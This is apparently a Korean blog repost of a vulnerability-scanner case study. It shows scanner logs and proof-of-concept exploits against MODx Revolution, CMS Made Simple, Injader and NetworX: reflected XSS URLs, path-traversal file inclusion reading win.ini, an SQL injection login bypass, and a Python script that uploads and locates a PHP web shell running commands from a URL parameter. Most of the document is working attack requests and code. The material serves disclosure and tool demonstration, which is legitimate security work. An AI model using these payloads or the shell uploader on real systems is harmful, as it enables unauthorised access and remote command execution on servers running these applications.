본문 바로가기
모의해킹 (WAPT)

PHP Vulnerability Hunter

by 날으는물고기 2011. 11. 21.

PHP Vulnerability Hunter

All testing was performed on Windows XP and Vista using XAMPP. Each target application was installed, then a full scan was performed. Noteworthy log entries revealing exploitable faults are shown followed by the expoit proof of concepts and resulting advisories.

Case Study 1: MODx Revolution 2.0.2-pl

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /modx/manager/index.php?service=12%3cscript%3ealert(0)%3c%2fscript%3e&login_context=12%3cscript%3ealert(0)%3c%2fscript%3e&q=12%3cscript%3ealert(0)%3c%2fscript%3e&cultureKey=12%3cscript%3ealert(0)%3c%2fscript%3e&modahsh=12%3cscript%3ealert(0)%3c%2fscript%3e&installGoingOn=12%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 13:54:18 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=653ch30lgkjk9bo8b7gu13u8u4; expires=Thu, 27-Jan-2011 13:54:18 GMT; path=/modx/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 20 Jan 2011 13:54:18 GMT
Cache-Control: post-check=0, pre-check=0
Content-Length: 6946
Content-Type: text/html; charset=UTF-8

[Response Trimmed]
<form id="modx-login-form" action="" method="post">
<input type="hidden" name="login_context" value="mgr" />
<input type="hidden" name="modahsh" value="12<script>alert(0)</script>" />
[Response Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Original Advisory

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /modx/manager/controllers/default/resource/tvs.php?class_key=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&resource=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 04:21:29 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 11
Content-Type: text/html

LFI_Test123

Local File Inclusion Proof of Concept

http://localhost/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
Original Advisory 


Case Study 2: CMS Made Simple 1.8

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /cmsms/admin/addbookmark.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 192
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="default_cms_lang"

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt 
------x--


HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 05:00:36 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: CMSSESSID839fe7b5=uk0uvk8aja6cfajgluik3sbok3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sp_=883fc4fd
Content-Length: 322
Content-Type: text/html

LFI_Test123<script type="text/javascript">
<!--
    location.replace("http://localhost/cmsms/admin/login.php");
// -->
</script>
<noscript>
    <meta http-equiv="Refresh" content="0;URL=http://localhost/cmsms/admin/login.php">
</noscript>

Local File Inclusion Proof of Concept

import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
urllib.urlencode({ 'default_cms_lang': lfi }),
{ 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()
Original Advisory 


Case Study 3: Injader 2.4.4

SQL Injection Log Entry

Alert Name: Potential SQL Injection
POST /injader/login.php?un='%3b--%22%3b--&pw='%3b--%22%3b-- HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 02:30:15 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 794
Content-Type: text/html

<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>C:\tools\xampp\htdocs\injader\sys\includes\ifw\IQuery.php</b> on line <b>143</b><br />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" 
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>Database Error</title>
<link rel="stylesheet" type="text/css" href="/injader/sys/loginpage.css" />
</head>
<body>
<div id="mPage">
<h1>Database Error</h1>
<p>Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1. </p>

<p>Your query was: SELECT username, id FROM maj_users WHERE username = '\'</p>
<p id="err-src"><strong>Source:</strong> User::ValidateLogin; Line: 179</p>
</div>
</body>
</html>

SQL Inection Proof of Concept

http://localhost/injader/login.php?un=\\'%20or%20id=1%20and%20'a'='a&pw=\\'%20or%20'a'='a
Original Advisory 


Case Study 4: NetworX 1.0.3

Arbitrary Upload Log Entry

Alert Name: Arbitrary File Event - Type=Changed Path=C:\tools\xampp\htdocs\networx\tmp\shell.php
POST /networx/about.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 195
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="shell_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
------x--


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:34:40 GMT
[Trimmed]

Shell Upload Proof of Concept

import sys, socket
host = 'localhost'
path = '/networx'
port = 80

def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)    

s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 193\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n\r\n'
'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
'------x--\r\n\r\n')

resp = s.recv(8192)

http_ok = 'HTTP/1.1 200 OK'

if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'

shell_path = path + '/tmp/shell.php'

s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
else: print 'shell located at http://' + host + shell_path

upload_shell()
Original Advisory

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /networx/group_connections_list_popup.php?logout=181%3cscript%3ealert(0)%3c%2fscript%3e&group_id=181%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:38:22 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=jl5bal27shg6e9akhu5566lqu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2107
Content-Type: text/html

[Trimmed]
<input type="hidden" name="GroupID" value="181<script>alert(0)</script>" />
<input type="image" src="images/btn-send_invitations.gif" alt="Send Invitations" />
[Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Original Advisory


출처 : autosectools.com
728x90

댓글